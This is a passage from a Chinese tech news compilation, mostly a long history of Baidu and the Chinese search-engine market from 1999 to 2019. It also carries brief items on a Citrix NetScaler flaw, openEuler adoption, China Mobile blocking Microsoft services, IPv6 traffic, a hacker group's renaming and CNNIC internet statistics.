值得注意的是,这项漏洞据称相当容易利用,在黑客利用相关漏洞并全身而退的情况下,他们不会在 NetScaler 设备中留下痕迹,网络安全部门无法通过日志检测到系统遭到入侵。Kevin Beaumont 认为,这是 Citrix 需要着手修复的设计缺陷。 #### 中国搜索20年:巨头百度的兴衰密码 4月30日,中国工程院公布了最新的院士候选名单,李彦宏的入选引发不少争议。昨日,中国科协相关负责人对外回应,李彦宏被推荐是因为其对于搜索引擎的贡献。 “搜索是百度成功的所有秘密。”李彦宏曾说。手握搜索这张王牌的百度,一度成为中国互联网的龙头老大,也曾以为可以凭此一路通关。 但谁也无法阻止一座冰山的消融。 移动互联网登台后,事情不再像李彦宏之前想象得那样简单。人们使用电脑和浏览器的时间大大减少,取而代之的是智能手机APP里的内容闭环,信息也不再像门户时代那样能够共享,搜索引擎开始逐渐失去原以为固若金汤的流量入口。 人们获取信息的渠道发生了质的变化——被动的信息推荐正在替代主动搜索成为主流。短视频、直播、游戏等各类应用百花齐放,争夺着用户的时间。 20年来,搜索引擎从PC时代掌握着绝对话语权的入口,缔造出百度、谷歌、搜狗、奇虎360等一批大公司,走到在移动互联网时代的信息孤岛里,逐渐式微。 回顾中国搜索20年,或许也相当于回顾百度20年。看过这20年,你会了解一个时代的风云变幻,也更理解其中公司的起起落落。今天,新时代的竞争者们让讲求“用完即走”的搜索引擎处于弱势,百度等公司也逐渐触到了广告营收的天花板,努力寻求下一个增长引擎。 这不再是一个搜索为王的时代,但搜索的故事可能会换一种方式继续讲下去。 1999-2005:搜索萌芽,百度发家 竞价排名起家 为百度带来源源不断营收的竞价排名,就像让人欲罢不能的大麻,成为导致其在此后陷于舆论声讨、难以持续创新的最大诱因。 1999年底,李彦宏回国了。他拿着120万美元的投资,在北大资源宾馆租了两间房,与好友徐勇开始创业。 在此之前,他在硅谷做了8年搜索业务,在搜索引擎技术领域,李彦宏排得上世界前三。让用户在海量信息中得到精确的搜索结果并不容易,当时国内还没有企业做这件事。 那是中国互联网刚刚起步的阶段,在当时,这门生意还只是向B端收钱。2000年1月1日,百度正式成立,半年内百度中文搜索技术正式诞生,包括搜狐、新浪、网易等门户陆续用上了百度的搜索技术。 不巧的是,以搜索技术见长的百度赶上了互联网泡沫破裂期,各个门户都不愿意花大价钱支付搜索服务费。“我们很快占据了中文搜索技术服务市场的绝对领先地位,可是我们依然没有盈利,这样的业务模式显然是有问题的!”焦虑的李彦宏急需一个能够盈利的商业模式。 这时他发现,硅谷公司Overture推出的“竞价排名”模式或许可以成为搜索引擎的生存解药。这家公司通过拍卖搜索结果的排名,在一片萧条的互联网行业,市值竟高达13亿美元,收入相当于如日中天的雅虎总收入的35%。 林军在《沸腾十五年》一书里写道,在2001年8月的董事会上,李彦宏坚决提出:把“百度”做成直接面对终端网民的搜索引擎网站,推出竞价排名机制。这引起了董事们的强烈反对:“Robin!我们当时投资可不是让你做竞价排名的!” 吵了三个小时,李彦宏发怒了,他猛地将手机朝桌上摔去,嚷着“我不做了,大家也都别做了,把公司关闭了拉倒!” 结果众所周知,董事们妥协了。 2001年8月,Baidu.com Beta版上线,页面只有简洁的搜索框,加上一个爪印。世界最大的中文搜索引擎就此出世。 李彦宏 次月,竞价排名业务展开,很多企业为了自己的公司名字能够在门户展示而竞价购买。而在B端,由于寒冬已至,各个门户纷纷拖欠付款,李彦宏凭借竞价排名度过了此劫。 只是当时,他们未料到,为百度带来源源不断营收的竞价排名,就像让人欲罢不能的大麻,成为导致其在此后陷于舆论声讨、难以持续创新的最大诱因。 内容护城河抗衡Google 面对Google的进攻,百度推出一系列产品,凿出了一条围绕搜索的内容护城河。 早在1996年,李彦宏还在华尔街时,就曾提出了搜索引擎的人气质量定律,也就是超链分析技术——谁的网页被链接次数多,那个网页就被认为是质量高,人气旺,加上相应的链接文字分析,就可以用在搜索结果的排序上了。李彦宏将之称为人气质量定律。1996年6月,他所在的公司申请了这一方面的美国专利。 1998年,斯坦福大学计算机系的两位研究生拉里·佩奇和谢尔盖·布林在类似的原理上,为超链加上了权重,应用在搜索结果中,他们创立了一个叫Google的搜索引擎。 当李彦宏将百度业务集中到建立推广中文搜索门户的时候,Google中文搜索已经开通一年多,凭借“自动抓取网站信息”的机制以及更合理的网站排名规则,成为大多数中国网民搜索资料的首选。 面对国际上最主流的搜索引擎Google的中国本土进攻,百度内部发起“闪电计划”,成立了以“小天才”雷鸣为首的技术突击队,要在9个月内“让百度引擎在技术上全面与Google抗衡”。 此外,百度推出一系列产品,凿出了一条围绕搜索的内容护城河。 2002年,百度MP3上线;2003年,图片、新闻搜索业务上线;百度贴吧上线,切入了社交网络领域;2004年,百度收购导航网站hao123,获取大量流量入口;一年后,百度知道上线,将互动问答平台与搜索业务结合。 CNNIC发布的第15次互联网报告显示,截至2004年12月31日,我国上网用户总数为9400万。互联网逐渐渗透到人们的日常生活中,“娱乐”成了核心功能。 内容壁垒成了百度当时最大的优势。很多刚刚接触互联网的小白第一个打开的页面就是hao123网址之家,打开“百度一下”,图片搜索、MP3搜索、贴吧等产品能很好得满足他们的娱乐需求。 hao123界面 这些产品为百度带来了用户和流量的巨大增长。在Google还未正式进入中国之时,百度先行取得阶段性胜利。 2003年6月,由中国电脑教育报举办的 “万人公开评测”公布了评测结果:59.06%的人选择了“Baidu比Google好”,Baidu.com首次超越Google,成为中国网民首选的搜索引擎。 另一个敌人:周鸿祎 当时的周鸿祎希望背靠雅虎大战百度,但却恰恰因与雅虎高层意见不合,缠斗两年,而错失战胜百度的良机。 相比于谷歌,当时的另一个对手,才真正关系到百度的生死存亡。 1998年,周鸿祎成立了3721,主要与其他网站达成合作,在网站上投放弹窗广告,同时在网站上下载的软件,会捆绑许多其他软件和文件。这种盈利方式开创了我国互联网盈利方式的先河,但也让周鸿祎一度颇受争议。 2002年,周鸿祎和李彦宏狭路相逢,一同争夺IE的地址栏——谁拿到了地址栏,谁就占领了流量入口。双方甚至上了法庭,但这只是二人战争的开端。 2003年前后,雅虎曾经谋求以1.5亿美元的价格买下百度,在李彦宏犹豫之时,雅虎选择了出价更低、盈利能力更强的3721,最终以1.2亿美元收购了3721,任命周鸿祎为雅虎中国总裁。 当时的周鸿祎希望背靠雅虎大战百度,但却恰恰因与雅虎高层意见不合,缠斗两年,而错失战胜百度的良机。 周鸿祎 周鸿祎上任伊始就对雅虎中国实施改革:推动中文上网的国际化、实现雅虎搜索的本地化、推动雅虎电邮取得优势地位。这些变革颇具成效,2004年底,雅虎中国在华业务达到历史最好水平:雅虎搜索超过Google中国,加上其独立搜索网站一搜后份额与百度持平。 但想要更进一步还需要更多的预算。对于周鸿祎大刀阔斧的变革,雅虎总部并不买账,他们更在意营收,并提出了更高的要求——2015年搜索超过百度成为市场第一,却不提供任何资金支持。这直接导致了周鸿祎与总部关系恶化,在双方争论不休时,百度已踏上了上市之路。 2004年6月,百度突然宣布Google参与其新一轮融资。这个时候,Google刚刚上市,股价持续上涨,开始筹办百度上市的李彦宏将百度塑造成“中国版Google”。 2005年8月5日,百度登陆纳斯达克,发行价定在了27美元,股价自开盘起一路狂飙,最终收盘价定格在122.54美元。这让李彦宏当场泪流满面,百度创造了互联网经济泡沫出现后的股市神话,让整个纳斯达克股市都为之沸腾。 百度上市同月,周鸿祎正式离开雅虎中国,一代搜索之争暂告一段落。此时搜索格局还是三分天下之势:百度、谷歌、雅虎所占市场份额分别为37%、23%、21%。 2006-2012:寡头百度,搜索巅峰 雅虎掉队 马云举棋不定的调整让雅虎走上了下坡路,360安全卫士的出现又给了雅虎致命一击,雅虎中国的搜索市场份额骤降至不到5%,彻底退出了搜索第一梯队的竞争。 周鸿祎走后,雅虎创始人杨致远找来了马云。这次他选择将雅虎中国完全交由马云打理。 2005年8月,雅虎宣布用总计6.4亿美元现金、雅虎中国业务及从软银购得的淘宝股份,交换阿里巴巴40%普通股。 有流量、能赚钱的搜索一直是马云惦记的香饽饽。甫一上任,马云便立下豪言壮语:“三年内,在中国,搜索就是雅虎,雅虎就是搜索。” 11月,雅虎在马云的带领下抛弃了门户概念,首页仅留一个搜索栏,此外,马云还叫停了一搜、无线、广告等盈利业务。 这超出了雅虎总部的容忍极限,未过半年,杨致远就勒令马云恢复雅虎中国首页、恢复原有盈利部门,雅虎中国又再次以门户面目出现。 马云 这时,周鸿祎携360安全卫士归来,主打维护计算机网络“安全”概念。当时互联网环境还非常糟糕,被盗号、中毒等安全问题几乎困扰着每一位网民。统计数据显示,2009年,半年内有1.95亿网民上网时遇到过病毒和木马的攻击,1.1亿网民遇到过账号或密码被盗的问题。 这款能够杀除“流氓插件”的产品一经推出装机率就直线上升,轻而易举将3721判了死刑。 大刀阔斧的改革、举棋不定的调整,让雅虎走上了下坡路,360安全卫士的出现又给了雅虎最后的致命一击,至此,雅虎中国从超20%的搜索市场份额,骤降至不到5%,彻底退出了搜索第一梯队的竞争。 Google走了 2009年,百度的市场份额达到63.1%,谷歌所占份额为33.2%,为当时第二大搜索引擎。2010年1月,Google宣布退出中国。百度成了这场本土战役的最大赢家。 2005年,Google的全球CEO施密特拜访了百度。他本希望采取控股或并购百度的方式进入中国,不想被李彦宏拒绝。7月,Google找来时任微软中国研究院院长、全球副总裁的李开复担任Google公司全球副总裁兼大中华区总裁。 2006年,Google正式成立中国子公司,4月推出了中文名“谷歌”。 当时,李开复的跳槽使得谷歌陷入了和微软的官司中。谷歌不得已请来了UT斯达康的首席运营官周韶宁和雅虎高层王怀南,与李开复组成“三驾马车”。 官司缠身的李开复承担起了校园招聘这一任务:虽然他迅速组建起了一支精英团队,谷歌却错过了进攻的黄金时期。 与雅虎败退相似,谷歌中国也历经了跨国公司的水土不服。周韶宁和王怀南与总部都产生了较大冲突,先后选择了离开。 李开复在《AI·未来》中也表达了他在谷歌中国时的无力。“总部一直拒绝过多代码'分支',我们发展每一项新功能,都要与总部打一场硬仗,这让我们动作迟缓,也让我们精疲力竭。许多谷歌中国的员工厌倦了和总公司的斗争,沮丧地离开了。” 李开复 此外,进入中国仅1个月时,谷歌就因与赶集网合用ICP牌照引来信息产业部的调查;2007年4月因全盘借鉴了搜狗输入法的词库,不得不公开道歉;2009年6月,央视曝光谷歌中国存大量淫秽色情信息,使得谷歌又一次陷入舆论风波中。 另一边,百度也在2008年跌入了舆论的谷底,当时央视持续曝光百度竞价排名问题。李彦宏当即将有问题竞价排名全部下线,并在年底上线搜索推广专业版凤巢系统,百度介绍,凤巢系统强调智能匹配,即把用户最需要的广告作为一种信息呈现出来。 2009年,李彦宏首次提出了“框计算”的概念,即用户只要在百度搜索框中搜索某种服务,例如视频或购票等,百度就能识别这种服务,将该需求直接匹配给最优的内容供应商或服务商来进行响应和处理,更直接地表现出自己更懂中国人的一面。 比如查询汇率,就会跳出查询工具 这一年,百度的市场份额达到63.1%,谷歌所占份额为33.2%,为当时第二大搜索引擎。 2010年1月,Google宣布退出中国。百度成了这场本土战役的最大赢家。 百度登顶 这之后的几年时间,百度的经营理念彻底转变为销售主导。再没有任何一款能够与早期的贴吧、知道等相提并论的产品面世。 百度终于站上了事业的巅峰。2011年3月24日,百度市值达到了460亿美元,超越了多年盘踞中国互联网公司市值首位的腾讯,成为当时市值最高的中国互联网企业。 一个数字值得注意,2011年,百度总营收为145.01亿元人民币,其中网络广告营收为144.90亿元,占比接近100%。   “骄傲。”一名当时在百度大搜部的员工对燃财经(ID:rancaijing)表示,这是谷歌离开后他们大部分人的状态。彼时的百度,成为了当之无愧的寡头,赢得战役的成就感、荣誉感,让很多百度人逐渐躺在功劳簿上,迷失了方向。“大家都像泄了气的皮球,每天只顾着完成修修补补的边角工作。” 当没有强大的对手在背后推着你前进时,“创新”也就无可避免地被忽视了。这之后的几年时间,百度的经营理念彻底转变为销售主导。再没有一款有早期的贴吧、知道等影响力的产品面世。 就在百度风头无两的时候,周鸿祎携360搜索侧面突击。 2012年8月,360推出搜索引擎产品,与百度、搜狗展开竞争。起势凶猛的360搜索测试版仅推出5天就占领了10%的市场份额,有数据显示,到2013年年底,360搜索一度占据中国搜索引擎市场23%的市场份额,超过搜狗,仅次于百度。 360搜索起势如此之快,360安全浏览器功不可没。财报显示,截至2012年6月底,奇虎360基于PC的产品和服务的月度活跃用户总人数为4.25亿人,其中,360安全浏览器的月度活跃用户人数为2.72亿人。 同样依赖于浏览器起家的还有搜狗。搜狗CEO王小川提出了“三级火箭”模式,用输入法带浏览器,用浏览器带搜索。在“三级火箭”中,浏览器起到了至关重要的跳转作用,没有浏览器,搜索便失去了载体。 2006年推出搜狗输入法,2008年在高压下坚持开发浏览器,一度被打入冷宫的王小川,在谷歌退出中国市场后也短暂坐上了搜索老二的位置。 搜索引擎格局进入百度一家独大,搜狗360争夺第二的“3SB”(360、Sogou、Baidu)大战格局。骄傲的百度自然不会把此时的周鸿祎当作对手,但是面对这样一个来势汹汹的突袭者,还是会被绊住手脚。 值得一提的是,后知后觉的百度也推出了百度浏览器,来争夺360浏览器的份额。对于百度来说,做浏览器实在是轻而易举的事情了,上述原百度员工告诉燃财经,当时百度内部一直认为浏览器不赚钱,并没有发现它的入口能力,就一直忽视了这个产品。 在“3SB”战局正酣时,他们都没有意识到,真正的大军早已压境。一个不再由搜索引擎把控入口的全新时代已然来临。 2013-2016:移动时代搜索式微 错失移动红利 数据显示,截至2012年第四季度,中国智能手机用户数达到3.8亿人。移动互联网时代的小巨头们皆已动身。 这一年,还在做房产搜索引擎的张一鸣嗅到了移动互联网的红利,开发了内涵段子等几十款内容社区类APP,并在8月创立了今日头条,通过内容社区为其导流。 在支付宝工作的程维开始思考,移动互联网或许可以改变出行的方式,2012年6月,程维递交了辞呈,创立了小桔科技,也就是滴滴打车。 这时,王兴仿照Gruopon将团购这一模式带入国内已有两年。 百度却对移动互联网做了误判。在2012年百度世界大会上,李彦宏预判“移动互联网是醉驾”,理由很简单:手机应用碎片化时间里用户消费低,广告、游戏和电商这互联网三大收入来源在移动互联网上均未获得明确的商业模式。 不好赚钱,是李彦宏最初给移动互联网下的结论。在外界看来,着眼于短期的商业价值,缺乏对未来的预判是导致他掉队的根本原因。 此时,百度还是依靠网络营销广告营收。以2012年第四季度财报为例,其当季总营收为63.35亿元人民币,来自网络营销的收入为62.88亿元。 2012年后,传统互联网逐渐走向手机移动互联网时代。 以微博和微信为首的大量APP开始在移动互联网时代占领统治地位,手机用户习惯于在微信APP中聊天、看公众号内容,在微博APP里看明星动态、热门资讯,在想要搜索时也会自然打开微信、微博的搜索框进行站内搜索,百度等搜索引擎变得越来越不重要了。 不仅如此,这些APP形成了信息孤岛,不再对外界开放内容,“搜索”对于海量信息的需求也就无法实现。这对引擎厂商来说有些致命——用户想要的内容可能搜不到了。 晚了一步的百度做出反应,从投资布局到业务发展都开始了面向移动端的战略重心转移。 2013年7月,百度宣布斥资19亿美元收购拥有完整移动互联应用产品群的91无线,以期在应用分发市场买下一张船票。但此举为时已晚,华为、小米等手机厂商纷纷打造自己的应用分发平台,第三方应用分发平台的空间越来越小。这场收购也被称作最不值得的交易。 百度还上线了手机百度APP,希望能复刻PC时代的流量胜局,但很快百度就发现移动端是条全新的赛道,搜索不再能作为把持流量的入口,原来的玩法很难走通。之后百度推出轻应用、直达号布局移动搜索,希望通过搜索入口直接让用户连接到应用本身。可是在移动端,“服务”成为更重要的命题,APP提供了服务、内容的闭环,这直接导致了对流量的分流。 2014年,O2O大热,反应过来的百度将目标瞄准了外卖市场,百度外卖成立。“如果用户绕过搜索引擎,将时间花在其他地方,我们就有麻烦了,因此,我们需要将用户与服务连接起来。”在李彦宏看来,O2O连接脱离不了搜索,这或许是另一个掌握流量入口的好生意。 百度外卖一经推出就表现出了极强的战斗力。有报告显示,2015年百度外卖在白领市场的占有率排名第一。 2015年6月30日,李彦宏在百度糯米O2O生态战略发布会上,宣称要砸200亿元到O2O。 他未曾想到的是,这一举措反而给行业做了背书,助推美团被更多资本认可。2015年10月,行业第一美团网与行业第二大众点评合并,2016年1月,美团点评完成金额超过33亿美元的首次融资,O2O战局大势已定。 在百度的规划里,是要形成一个“以移动搜索、个人云和地图作为移动业务的突破口,提升移动应用分发能力,再聚合移动端业务形成O2O闭环——搜索+分发+LBS+支付”。 但有观点认为,O2O重运营、深耕线下的核心竞争力,与百度强技术、流量分发的能力并不匹配。事实也证明,技术基因更胜一筹的百度在其他业务上都没有起色,而在拼技术的云服务上,虽然比阿里晚了4年,比腾讯晚了2年,却在战局中并不逊色,究其原因,还是百度背后强大的技术团队与基础建设能力。 这在一定程度上也表明,没有运营基因的百度,或许更适合做技术定位的产品。 竞价排名危机爆发 2015年,百度的总体收入增速已经呈下跌趋势。仅凭搜索业务已经无法再续写昔日的荣耀。百度急需找到下一个引擎,来带动它生命周期的第二曲线。 在移动互联网时代,搜索引擎市场也已洗牌,逐渐被BAT垄断。应该看到的是,这门生意的大盘本身已经在缩小了。 2013年9月16日,腾讯入股搜狗,将搜搜业务并入,以4.48亿美元获得搜狗36.5%的股份。 同年UC整合了阿里巴巴“一搜”团队和业务,引进了来自百度、谷歌、微软、雅虎、360等公司的搜索产品技术专家。2014年4月28日,UC正式宣布与阿里巴巴合作共同发布旗下移动搜索引擎品牌——神马搜索。 神马搜索更多承担的是打通搜索和阿里电商数据流通的使命。但因为背靠当时市占率34.5%的UC浏览器,一出生便有大量流量扶持。数据显示,截至2015年3月,神马搜索的市场份额达到13.35%,位列第二,排在首位的百度市场份额达79.61%,搜狗搜索以5.8%排列第三。 百度凭借着品牌和技术优势在这场战役中还紧握着大半的份额,但在2015年,百度的总体收入增速已经呈下跌趋势。 百度在2015年增速大降,2016年仅为6%  制图 / 燃财经 2015年,4G已经开始普及,全民娱乐时代来临。 截至2014年12月,我国手机网民规模达5.57亿,单人日均使用手机时长达到了1.67小时,直播、游戏、视频、信息流占据了大部分用户时间。各家运营方都在绞尽脑汁地抢占用户的注意力与时间。 直至2016年,百度迎来了20年内的至暗时刻。 2016年2月,百度被爆出“血友病吧”等贴吧被卖。不到3个月后,因为魏则西之死,百度再一次被推上风口浪尖。当时官方的调查结果称:百度搜索相关关键词竞价排名结果,客观上对魏则西选择就医产生了影响。 魏则西事件爆发后,百度进行了大幅度整改,控制商业推广信息占比不超过30%,同时加强对“商业推广”字样的标注强度。同期,360搜索宣布放弃一切医疗商业推广,搜狗CEO王小川宣布发布新功能“搜索明医”。百度一时间成为众矢之的。 影响直接反映在了财报上,当年百度的收入增速直降到6%,相比腾讯阿里近50%的增速少得可怜,市值628亿美元,比腾讯阿里低了三个身位,彻底掉队。之前一直为百度带来95%以上营收的竞价排名,终于还给了百度沉重的打击。 种种表现也从侧面证明,百度仅凭搜索业务已经无法再续写昔日的荣耀。眼看走向衰败期的百度急需找到下一个引擎,来带动它生命周期的第二曲线。 2017-2019:后搜索时代 ALL in AI 信息流:下一个引擎 急于变革的李彦宏喊着“All in AI”,并请来了前微软全球执行副总裁陆奇。2017年1月17日,百度宣布任命陆奇为百度集团总裁和首席运营官,负责产品、技术、销售、营销运营。 李彦宏给陆奇列出了百度TOP10的挑战,希望能与陆奇共同解决。其中之一就是为百度找到下一个可见的规模增长点。 李彦宏(左)和陆奇(右) 陆奇提出了主航道和护城河的概念:以feed流和人工智能组成的主航道,代表百度未来;护城河是为主航道保驾护航的其他业务,比如百度百科、百度知道等优势产品,代表百度的现在。 人工智能短期内尚难以看到回报,百度将希望押注在了信息流。2017年2月6日,李彦宏在内部演讲中反复强调:“百度从本质来讲,最核心的东西还是在做内容的分发。”这也是搜索的本质。 据经济观察报报道,2017年,百度在内部已定下目标,要用2年到3年的时间,用信息流再造一个“搜索”,届时信息流广告和搜索广告总额有望达到现在的两倍。 对于用户来说,利用算法+人工智能推荐的信息流模式,本质是一种被动搜索,以百度的算法和数据基础想做并不难,但却又因慢了一大拍,不得不与小巨头今日头条打一场硬仗。 2014年,当被问及谁是最大竞争对手时,张一鸣表示,是百度。百度有最好的算法人才,也最有实力来做信息流业务。 当字节跳动(原今日头条)刚刚崛起的时候,百度的VP也曾注意到这个未来可能会撼动百度地位的公司。只是当时,李彦宏一心只把微信当对手。他想不通,一个盈利模式与自己没什么差别的小公司能激起什么浪花。百度就这样给了字节跳动将近3年时间慢慢发展壮大。 为了弥补晚入场的几年,百度举全公司之力推广信息流。 2016年,手机百度APP首页加入智能信息流推荐,从“一搜即得”走向“不搜即得”。手机百度APP成为搭载信息流产品的主要阵地,百度网盘、百度贴吧等近百个产品都开始为手机百度APP导流。 2017年下半年,李彦宏亲自带头抓信息流业务,甚至会在员工群里反馈“我为什么没收到搜狗IPO路演PPT注释推送”等细节问题。 要做好信息流需要庞大的内容池,2017年百家号累计向内容生产者分成100亿,所有个人和机构内容生产者都可以入驻百家号。2018年,百度又推出“百万年薪”计划,希望用扶植政策让一批内容创作者获得百万年薪。 有媒体报道,为信息流贡献的内容量,是包括百度百科、百家号等内容部门重要的KPI考核指标。此外,百度也布局短视频赛道,包括好看视频、全民小视频等等。 在广告方面,百度在代理商大会上力推信息流广告,加大优惠促销力度,并采用搜索+信息流广告“搭售”的方式来启动市场。 在全公司全力推广之下,信息流业务收入增长成为百度财务表现最大亮点。 2017年第二季度信息流广告收入从一季度底的每天1000万上涨到了每天3000万。到2017年11月,百度世界大会上,百度副总裁沈抖宣布百度信息流的成绩单:月活超过6亿,累计收入已超过67亿元。 据QuestMobile数据,2018年(手机)百度成为资讯信息流媒介平台日均活跃用户数最多的App。截至2018年11月,百度App平均日活达到1.6亿,今日头条日活为1.2亿。但在用户停留时长上,百度App仅为40分钟,远不及今日头条的90分钟。 张一鸣 “搜索+信息流”双引擎的模式给百度带来了新的增长点,却也同样带来了质疑。 今年年初,一篇名为《搜索引擎百度已死》的文章刷屏,直指百度已成为“百家号站内搜”。百度也知道,为百家号导流势必会影响产品体验,甚至让自己离链接互联网信息的搜索引擎愈走愈远。但这也是没有办法中的办法,面对移动时代的信息孤岛,逐渐流失优质内容的搜索引擎百度,只有尽快培养起百家号,才能突破自己的天花板。 如今,百度与头条的战况已经进入白热化,后者已经直捣百度腹地,在搜索业务上布局了将近两年,现在,今日头条App上已经可以搜索到不少来自站外的内容。 4月26日,两家又掀起了起诉大战。百度以不正当竞争为由起诉今日头条,海淀法院已立案。起诉理由是,今日头条大量窃取百度“TOP1” 搜索产品结果,索赔9000万元。下午,抖音同样以不正当竞争为由,称发现百度在简单搜索中窃取了海量抖音短视频。并作出同样要求:立即停止侵权,赔偿9000万元,并在百度首页连续道歉30天。 面对与自己产品线全面接壤的字节跳动,百度的形势不容乐观。字节跳动2018年已经实现了500亿至550亿的营收目标,并且将2019年的营收目标瞄准在了1000亿。相比之下,百度2018年1023亿元、“百度核心”(Baidu Core,即搜索服务与交易服务的组合)783亿元的总营收并不算多。在市值上,百度如今还不到600亿美元,字节跳动估值已达750亿美元。 All in AI “搜索引擎本身就是一种AI。”王小川说。发力AI,人机交互,被认为是每个搜索引擎公司的未来。 据Statcounter最近发布的中国移动搜索引擎市场份额报告,中国区搜索引擎市场份额排行中,百度独占鳌头,至今仍是国内搜索引擎巨头,市场份额高达70.3%。神马搜索市场份额提升至15.62%,搜狗搜索占4.74%,360搜索(好搜)占4.54%。 中国区2018年搜索引擎市场份额 整个搜索格局还是百度一家独大,神马、搜狗、360紧随其后,但大家都面临着广告业务即将触达天花板的瓶颈。新秀字节跳动近年在广告表现上也有下滑趋势。今年年初,据彭博社援引知情人士消息称,字节跳动在最新一轮融资中对投资者称,预计2018年公司营收为人民币500亿-550亿元,但最终只达到目标区间下限。如今公司已经开始慢慢将获取流量的希望转移到游戏、电商、教育等领域了。 内忧加外患,对于长于技术的百度来说,新的增长点似乎只有AI。 “搜索引擎本身就是一种AI。”王小川说。发力AI,人机交互,被认为是每个搜索引擎公司的未来,谷歌、百度、搜狗、360不外如是。 其中,语音交互被看作是最主流的形式。 2017年11月9日,搜狗打着人工智能的招牌登陆纽交所,成为继百度之后中国第二家以搜索为主营业务的上市公司。 王小川表示,搜狗要借助语音,切入硬件领域,例如车载和家居硬件等。阿里2014年成立了iDST智能语音交互团队,2017年推出AliGenie语音开发者平台。今年4月,360集团推出智能音箱等产品,抢夺IoT生态入口与语音交互搜索市场份额。 2018年1月,尚未离开百度的陆奇也曾表示,要重点打造若干新的AI赋能的业务,尤其是用于自动驾驶的Apollo和用于对话式人机交互的DuerOS。虚拟助手“度秘”,也是百度对于搜索模式的一种重构,借助人工智能技术,百度希望让“搜索”变得更智能高效。百度语音交互的服务有潜能成为物联网领域的操作系统,掌握了智能设备和操作系统,或许就把握住了下一个时代的入口。 去年双十一,百度已成为智能音箱销售品类的第一,搭载DuerOS的激活设备数量达到2亿台,DuerOS在2018年12月语音交互也超过了16亿次。 百度DuerOS生态版图 如今语音搜索还只停留在语义识别的技术层面,还达不到“智能”的水平。智能系统可以回答用户今天天气如何,却很难指引用户穿什么厚度的衣物。 搜索引擎们期待用AI做到更高级的匹配,一旦技术水平可以提供更多信息与“服务”,那搜索的空间将会是另一片蓝海。只是,在这一天来临之前,我们都不知道这次会是谁成为搜索的赢家。 #### 中国服务器操作系统领域华为欧拉系统新增市场份额达到22% 12月26日消息:在今天的操作系统产业峰会 2022 预沟通会上,华为公司方面透露,截至今年 11 月,欧拉系统装机量累计实现 245 万套,在中国服务器操作系统领域,新增市场份额达到22%。 据介绍,欧拉(openEuler)是华为开发的面向服务器市场的操作系统,作为一个支持多样性算力的开源操作系统,openEuler支持x86、Arm、RISC-V、LoongArch、SW64、Power六大处理器架构。 欧拉是面向数字基础设施的开源操作系统,支持服务器、云计算、边缘计算、嵌入式等应用场景,首个数字基础设施全场景长周期版本openEuler 22.03 LTS已于今年 4 月发布。在欧拉开源社区全体成员单位和全体开发者的努力下,已有 600 多家企业加入社区,超过 12000 名贡献者,组建了 99 个SIG组。今年 11 月,openEuler首次荣获 2022 年世界互联网领先科技成果奖。 #### 中国移动把Microsoft 微软服务给屏蔽了 8 月 19 日消息,微软社区网友 LiCaoZ 发文表示,自 8 月 19 日 11 时起,包括必应搜索在内的部分 Microsoft 服务受到了部分地区中国移动省份网关屏蔽,流向 Microsoft 数据中心节点的数据包会在经过省份网关时被丢弃。 8 月 19 日 17 时 10 分,根据 Light Beacon [湖北]、L1_Xu4n [湖北]、山河万里 [宁夏]、宇康 吴 [湖南]、JingZheYou [湖北]、朱小丞 [辽宁]、冰河?[湖北]、chaosjulien [湖南]、浪疯 [山东]、Shih Chun [重庆] 用户反馈和作者 [河南] 验证,cn.bing.com 必应搜索服务现已在部分省市恢复可用。 移动网络自带防火墙一事已经不是什么新鲜事了,做过网站的同学都知道的事,经过无缘无故墙掉一些网站,导致无法访问,而且找不到申诉的地方,做网站的苦不堪言,没想到现在连微软服务都屏蔽了。 #### 中国移动网络IPv6流量首次超过 IPv4 4月3日消息:据国家 IPv6 发展监测平台的最新数据显示,2023 年 2 月,我国移动网络 IPv6 占比达到50.08%,首次实现移动网络 IPv6 流量超过 IPv4 流量的历史性突破。这一里程碑式的事件表明,我国在推进 IPv6 规模部署及应用方面取得了新的进展。 据中国信息通信研究院的监测数据显示,截至 2023 年 2 月,全国有超过95%的 CDN 节点支持 IPv6,而在13家主要云服务企业的54个可用域中,IPv6 访问质量优于 IPv4 的有40个,占比74.07%。这一结果表明,IPv6 网络和应用的质量得到了不断的提升。 IPv6 是网际协议的最新版本,用作互联网的协议。与 IPv4 相比,IPv6 的设计目的是取代 IPv4,并在其他方面对于 IPv4 有许多改进。IPv6 的使用增长缓慢,但在 2022 年 4 月,通过 IPv6 使用 Google 服务的用户百分率首次超过 40%。 总的来说,我国在 IPv6 规模部署及应用方面已经取得了重要进展,这一趋势将有助于提高互联网的性能和可靠性,进一步推动我国信息化建设的发展。 #### 中国红客联盟内斗,更名为弘客联盟 7 月 7 日消息,中国红客联盟官方微博昨日发布公告,即日起宣传解散,并更名为弘客联盟。 该微博称,因原红客联盟创始人林勇将红客商业化,招集原红客成员洽谈合作,因志不同道不合,本联盟拒绝合作,遭林勇以红客联盟创始人身份以打假为由,恶意造谣、煽动是非,引起红客粉丝网暴。至此我们更名为 弘客联盟,继续发扬爱国主义精神,普及网络安全知识。 根据官博晒出的截图,中国红客联盟似乎发生了一些纷争,原红客联盟创始人林勇与目前红客联盟备案法人代表汪林互相进行指责。 据公开资料,中国红客联盟又叫 H.U.C。成立于 2000 年底,是由黑客界 LION 牵头组建的,吸纳了全国众多黑客高手,该组织主要反击国外一些黑客的攻击。红客联盟于 2004 年 12 月 31 日成立四周年之际,在其网站上发表公开信,宣布解散,同时关闭网站。2011 年 9 月 22 日宣布重新组建,新网站于 2011 年 11 月 1 日开放。 #### 中国网民规模达 11.08 亿人,域名总数为 3302 万个,其中国家顶级域名“.CN”数量为 2082 万个。 1 月 17 日消息,据央视新闻报道,中国互联网络信息中心(CNNIC)今日发布第 55 次《中国互联网络发展状况统计报告》。《报告》显示,截至 2024 年 12 月,中国网民规模达 11.08 亿人,互联网普及率升至 78.6%。 截至 2024 年 12 月,IPv6 地址数量为 69148 块 / 32,同比增长 1.6%;域名总数为 3302 万个,其中国家顶级域名“.CN”数量为 2082 万个。 截至 2024 年 11 月,已累计建成 5G 基站达 419.1 万个,比上年末净增 81.5 万个;三家基础电信企业发展蜂窝物联网终端用户 26.42 亿户,占移动网终端连接数的比重达 59.6%。 截至 2024 年 12 月,我国农村网民规模达 3.13 亿人,占网民整体的 28.2%。村级寄递物流综合服务站累计建设 33.78 万个。 截至 12 月,我国有 3.31 亿人表示自己听说过生成式人工智能产品,占整体人口的 23.5%;有 2.49 亿人表示自己使用过生成式人工智能产品,占整体人口的 17.7%。在生成式人工智能用户中,利用生成式人工智能产品回答问题的用户最为广泛,占比达 77.6%;将生成式人工智能产品作为办公助手的用户占比达 45.5%。 截至 12 月,网络购物用户规模达 9.74 亿人,较 2023 